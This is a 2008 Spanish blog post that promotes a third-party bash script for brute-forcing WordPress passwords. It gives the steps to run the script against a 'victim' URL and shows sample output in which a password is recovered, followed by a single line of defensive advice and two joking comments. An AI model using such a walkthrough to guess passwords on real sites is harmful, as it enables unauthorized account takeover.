foros de software libre :: chat #softwarelibre :: socios :: siguiente web/blog»

24th Sep 2008

Fuerza Bruta a blogs Wordpress

Zerialkiller pone a disposición nuestra un script que por fuerza bruta permite obtener el password de los blogs montados sobre wordpress.

wp-bruteforce

Lo descargamos y le damos permisos de ejecución.

chmod +x wp-bruteforce

Nos hacemos de un diccionario de palabras y lo renombramos como bf_passwords. Ahora ejecutamos el script y nos pedirá la dirección de la victima.

lesthack@lesthack-laptop:~$ ./wp-bruteforcer
.::Wordpress BruteForce By 0x90::.
use a good dictioary rename it to bf_passwords
Enter website with full path to wordpress:
> http://blogwordpress.com/
trying password
trying password !
trying password !
trying password !!
trying password !!2004
trying password !@#$%
...
...
Bengo WebSite http://blogwordpress.com/ password is: 02032
Have Fun ;)

Una forma de protegernos es no utilizar la cuenta por default llamada admin, y si lo hacemos, establecer un password de una longitud mayor a 12 caracteres, incluyendo letras, números y símbolos.

Via: ZerialKiller

This entry was posted on Wednesday, September 24th, 2008 at 3:23 am and is filed under bash, codigos, enlaces, hacking, programacion. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Responses to “Fuerza Bruta a blogs Wordpress”

  1. September 24th, 2008 at 3:44 am Nick Says:

    Intentaras usar eso contra mí?…iré tomando medidas preventivas…desde aquella vez que pudiste haberme hackeado me das miedo :-)

  2. September 25th, 2008 at 12:47 am lesthack Says:

    jaja, @Nick perdona lo de aquella vez, y no, pero me parece interesante el script y como utiliza lynx para hacer las peticiones.

Leave a Reply